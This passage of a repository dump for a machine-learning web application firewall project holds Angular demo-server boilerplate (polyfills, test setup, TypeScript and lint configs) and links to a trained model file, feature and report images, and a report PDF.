 6 | 
 7 | if (environment.production) {
 8 |   enableProdMode();
 9 | }
10 | 
11 | platformBrowserDynamic().bootstrapModule(AppModule);
12 | 


--------------------------------------------------------------------------------
/demo-server/src/polyfills.ts:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * This file includes polyfills needed by Angular and is loaded before the app.
 3 |  * You can add your own extra polyfills to this file.
 4 |  *
 5 |  * This file is divided into 2 sections:
 6 |  *   1. Browser polyfills. These are applied before loading ZoneJS and are sorted by browsers.
 7 |  *   2. Application imports. Files imported after ZoneJS that should be loaded before your main
 8 |  *      file.
 9 |  *
10 |  * The current setup is for so-called "evergreen" browsers; the last versions of browsers that
11 |  * automatically update themselves. This includes Safari >= 10, Chrome >= 55 (including Opera),
12 |  * Edge >= 13 on the desktop, and iOS 10 and Chrome on mobile.
13 |  *
14 |  * Learn more in https://angular.io/docs/ts/latest/guide/browser-support.html
15 |  */
16 | 
17 | /***************************************************************************************************
18 |  * BROWSER POLYFILLS
19 |  */
20 | 
21 | /** IE9, IE10 and IE11 requires all of the following polyfills. **/
22 | // import 'core-js/es6/symbol';
23 | // import 'core-js/es6/object';
24 | // import 'core-js/es6/function';
25 | // import 'core-js/es6/parse-int';
26 | // import 'core-js/es6/parse-float';
27 | // import 'core-js/es6/number';
28 | // import 'core-js/es6/math';
29 | // import 'core-js/es6/string';
30 | // import 'core-js/es6/date';
31 | // import 'core-js/es6/array';
32 | // import 'core-js/es6/regexp';
33 | // import 'core-js/es6/map';
34 | // import 'core-js/es6/set';
35 | 
36 | /** IE10 and IE11 requires the following for NgClass support on SVG elements */
37 | // import 'classlist.js';  // Run `npm install --save classlist.js`.
38 | 
39 | /** IE10 and IE11 requires the following to support `@angular/animation`. */
40 | // import 'web-animations-js';  // Run `npm install --save web-animations-js`.
41 | 
42 | 
43 | /** Evergreen browsers require these. **/
44 | import 'core-js/es6/reflect';
45 | import 'core-js/es7/reflect';
46 | 
47 | 
48 | /** ALL Firefox browsers require the following to support `@angular/animation`. **/
49 | // import 'web-animations-js';  // Run `npm install --save web-animations-js`.
50 | 
51 | 
52 | 
53 | /***************************************************************************************************
54 |  * Zone JS is required by Angular itself.
55 |  */
56 | import 'zone.js/dist/zone';  // Included with Angular CLI.
57 | 
58 | 
59 | 
60 | /***************************************************************************************************
61 |  * APPLICATION IMPORTS
62 |  */
63 | 
64 | /**
65 |  * Date, currency, decimal and percent pipes.
66 |  * Needed for: All but Chrome, Firefox, Edge, IE11 and Safari 10
67 |  */
68 | // import 'intl';  // Run `npm install --save intl`.
69 | 


--------------------------------------------------------------------------------
/demo-server/src/styles.css:
--------------------------------------------------------------------------------
1 | /* You can add global styles to this file, and also import other style files */
2 | 


--------------------------------------------------------------------------------
/demo-server/src/test.ts:
--------------------------------------------------------------------------------
 1 | // This file is required by karma.conf.js and loads recursively all the .spec and framework files
 2 | 
 3 | import 'zone.js/dist/long-stack-trace-zone';
 4 | import 'zone.js/dist/proxy.js';
 5 | import 'zone.js/dist/sync-test';
 6 | import 'zone.js/dist/jasmine-patch';
 7 | import 'zone.js/dist/async-test';
 8 | import 'zone.js/dist/fake-async-test';
 9 | import { getTestBed } from '@angular/core/testing';
10 | import {
11 |   BrowserDynamicTestingModule,
12 |   platformBrowserDynamicTesting
13 | } from '@angular/platform-browser-dynamic/testing';
14 | 
15 | // Unfortunately there's no typing for the `__karma__` variable. Just declare it as any.
16 | declare var __karma__: any;
17 | declare var require: any;
18 | 
19 | // Prevent Karma from running prematurely.
20 | __karma__.loaded = function () {};
21 | 
22 | // First, initialize the Angular testing environment.
23 | getTestBed().initTestEnvironment(
24 |   BrowserDynamicTestingModule,
25 |   platformBrowserDynamicTesting()
26 | );
27 | // Then we find all the tests.
28 | const context = require.context('./', true, /\.spec\.ts$/);
29 | // And load the modules.
30 | context.keys().map(context);
31 | // Finally, start Karma to run the tests.
32 | __karma__.start();
33 | 


--------------------------------------------------------------------------------
/demo-server/src/tsconfig.app.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "extends": "../tsconfig.json",
 3 |   "compilerOptions": {
 4 |     "outDir": "../out-tsc/app",
 5 |     "module": "es2015",
 6 |     "baseUrl": "",
 7 |     "types": []
 8 |   },
 9 |   "exclude": [
10 |     "test.ts",
11 |     "**/*.spec.ts"
12 |   ]
13 | }
14 | 


--------------------------------------------------------------------------------
/demo-server/src/tsconfig.spec.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "extends": "../tsconfig.json",
 3 |   "compilerOptions": {
 4 |     "outDir": "../out-tsc/spec",
 5 |     "module": "commonjs",
 6 |     "target": "es5",
 7 |     "baseUrl": "",
 8 |     "types": [
 9 |       "jasmine",
10 |       "node"
11 |     ]
12 |   },
13 |   "files": [
14 |     "test.ts"
15 |   ],
16 |   "include": [
17 |     "**/*.spec.ts",
18 |     "**/*.d.ts"
19 |   ]
20 | }
21 | 


--------------------------------------------------------------------------------
/demo-server/src/typings.d.ts:
--------------------------------------------------------------------------------
1 | /* SystemJS module definition */
2 | declare var module: NodeModule;
3 | interface NodeModule {
4 |   id: string;
5 | }
6 | 


--------------------------------------------------------------------------------
/demo-server/tfidf_2grams_randomforest.p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/demo-server/tfidf_2grams_randomforest.p


--------------------------------------------------------------------------------
/demo-server/tsconfig.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "compileOnSave": false,
 3 |   "compilerOptions": {
 4 |     "outDir": "./dist/out-tsc",
 5 |     "baseUrl": "src",
 6 |     "sourceMap": true,
 7 |     "declaration": false,
 8 |     "moduleResolution": "node",
 9 |     "emitDecoratorMetadata": true,
10 |     "experimentalDecorators": true,
11 |     "target": "es5",
12 |     "typeRoots": [
13 |       "node_modules/@types"
14 |     ],
15 |     "lib": [
16 |       "es2016",
17 |       "dom"
18 |     ]
19 |   }
20 | }
21 | 


--------------------------------------------------------------------------------
/demo-server/tslint.json:
--------------------------------------------------------------------------------
  1 | {
  2 |   "rulesDirectory": [
  3 |     "node_modules/codelyzer"
  4 |   ],
  5 |   "rules": {
  6 |     "callable-types": true,
  7 |     "class-name": true,
  8 |     "comment-format": [
  9 |       true,
 10 |       "check-space"
 11 |     ],
 12 |     "curly": true,
 13 |     "eofline": true,
 14 |     "forin": true,
 15 |     "import-blacklist": [true, "rxjs"],
 16 |     "import-spacing": true,
 17 |     "indent": [
 18 |       true,
 19 |       "spaces"
 20 |     ],
 21 |     "interface-over-type-literal": true,
 22 |     "label-position": true,
 23 |     "max-line-length": [
 24 |       true,
 25 |       140
 26 |     ],
 27 |     "member-access": false,
 28 |     "member-ordering": [
 29 |       true,
 30 |       "static-before-instance",
 31 |       "variables-before-functions"
 32 |     ],
 33 |     "no-arg": true,
 34 |     "no-bitwise": true,
 35 |     "no-console": [
 36 |       true,
 37 |       "debug",
 38 |       "info",
 39 |       "time",
 40 |       "timeEnd",
 41 |       "trace"
 42 |     ],
 43 |     "no-construct": true,
 44 |     "no-debugger": true,
 45 |     "no-duplicate-variable": true,
 46 |     "no-empty": false,
 47 |     "no-empty-interface": true,
 48 |     "no-eval": true,
 49 |     "no-inferrable-types": [true, "ignore-params"],
 50 |     "no-shadowed-variable": true,
 51 |     "no-string-literal": false,
 52 |     "no-string-throw": true,
 53 |     "no-switch-case-fall-through": true,
 54 |     "no-trailing-whitespace": true,
 55 |     "no-unused-expression": true,
 56 |     "no-use-before-declare": true,
 57 |     "no-var-keyword": true,
 58 |     "object-literal-sort-keys": false,
 59 |     "one-line": [
 60 |       true,
 61 |       "check-open-brace",
 62 |       "check-catch",
 63 |       "check-else",
 64 |       "check-whitespace"
 65 |     ],
 66 |     "prefer-const": true,
 67 |     "quotemark": [
 68 |       true,
 69 |       "single"
 70 |     ],
 71 |     "radix": true,
 72 |     "semicolon": [
 73 |       "always"
 74 |     ],
 75 |     "triple-equals": [
 76 |       true,
 77 |       "allow-null-check"
 78 |     ],
 79 |     "typedef-whitespace": [
 80 |       true,
 81 |       {
 82 |         "call-signature": "nospace",
 83 |         "index-signature": "nospace",
 84 |         "parameter": "nospace",
 85 |         "property-declaration": "nospace",
 86 |         "variable-declaration": "nospace"
 87 |       }
 88 |     ],
 89 |     "typeof-compare": true,
 90 |     "unified-signatures": true,
 91 |     "variable-name": false,
 92 |     "whitespace": [
 93 |       true,
 94 |       "check-branch",
 95 |       "check-decl",
 96 |       "check-operator",
 97 |       "check-separator",
 98 |       "check-type"
 99 |     ],
100 | 
101 |     "directive-selector": [true, "attribute", "app", "camelCase"],
102 |     "component-selector": [true, "element", "app", "kebab-case"],
103 |     "use-input-property-decorator": true,
104 |     "use-output-property-decorator": true,
105 |     "use-host-property-decorator": true,
106 |     "no-input-rename": true,
107 |     "no-output-rename": true,
108 |     "use-life-cycle-interface": true,
109 |     "use-pipe-transform-interface": true,
110 |     "component-class-suffix": true,
111 |     "directive-class-suffix": true,
112 |     "no-access-missing-member": true,
113 |     "templates-use-public": true,
114 |     "invoke-injectable": true
115 |   }
116 | }
117 | 


--------------------------------------------------------------------------------
/images/features/distinct-bytes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/distinct-bytes.png


--------------------------------------------------------------------------------
/images/features/js-keywords.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/js-keywords.png


--------------------------------------------------------------------------------
/images/features/length.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/length.png


--------------------------------------------------------------------------------
/images/features/max-byte.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/max-byte.png


--------------------------------------------------------------------------------
/images/features/mean-byte.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/mean-byte.png


--------------------------------------------------------------------------------
/images/features/min-byte.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/min-byte.png


--------------------------------------------------------------------------------
/images/features/non-printable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/non-printable.png


--------------------------------------------------------------------------------
/images/features/punctuation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/punctuation.png


--------------------------------------------------------------------------------
/images/features/sql-keywords.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/sql-keywords.png


--------------------------------------------------------------------------------
/images/features/std-byte.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/features/std-byte.png


--------------------------------------------------------------------------------
/images/presentation_tables/custom_features_table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/presentation_tables/custom_features_table.png


--------------------------------------------------------------------------------
/images/presentation_tables/f1_result_table.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/presentation_tables/f1_result_table.png


--------------------------------------------------------------------------------
/images/presentation_tables/ngrams_example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/presentation_tables/ngrams_example.png


--------------------------------------------------------------------------------
/images/report_images/1gram_tfidf_randomforest_learningcurve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/1gram_tfidf_randomforest_learningcurve.png


--------------------------------------------------------------------------------
/images/report_images/1grams_count_pca.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/1grams_count_pca.png


--------------------------------------------------------------------------------
/images/report_images/3gram_count_multinomial_learningcurve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/3gram_count_multinomial_learningcurve.png


--------------------------------------------------------------------------------
/images/report_images/3grams_tfidf_pca.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/3grams_tfidf_pca.png


--------------------------------------------------------------------------------
/images/report_images/SVM_kernel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/SVM_kernel.png


--------------------------------------------------------------------------------
/images/report_images/bagofwords_example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/bagofwords_example.png


--------------------------------------------------------------------------------
/images/report_images/classifier_example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/classifier_example.png


--------------------------------------------------------------------------------
/images/report_images/classifiers_f1score.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/classifiers_f1score.png


--------------------------------------------------------------------------------
/images/report_images/custom_pca.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/custom_pca.png


--------------------------------------------------------------------------------
/images/report_images/custom_svm_learningcurve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/custom_svm_learningcurve.png


--------------------------------------------------------------------------------
/images/report_images/data_distribution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/data_distribution.png


--------------------------------------------------------------------------------
/images/report_images/logistic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/logistic.png


--------------------------------------------------------------------------------
/images/report_images/optimizing_example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/optimizing_example.png


--------------------------------------------------------------------------------
/images/report_images/roc_curves.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/roc_curves.png


--------------------------------------------------------------------------------
/images/report_images/roc_graph_topbot3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/roc_graph_topbot3.png


--------------------------------------------------------------------------------
/images/report_images/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/images/report_images/website.png


--------------------------------------------------------------------------------
/report.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/grananqvist/Machine-Learning-Web-Application-Firewall-and-Dataset/5f660d91304a5ecbc706ae15beb8306671265d7b/report.pdf


--------------------------------------------------------------------------------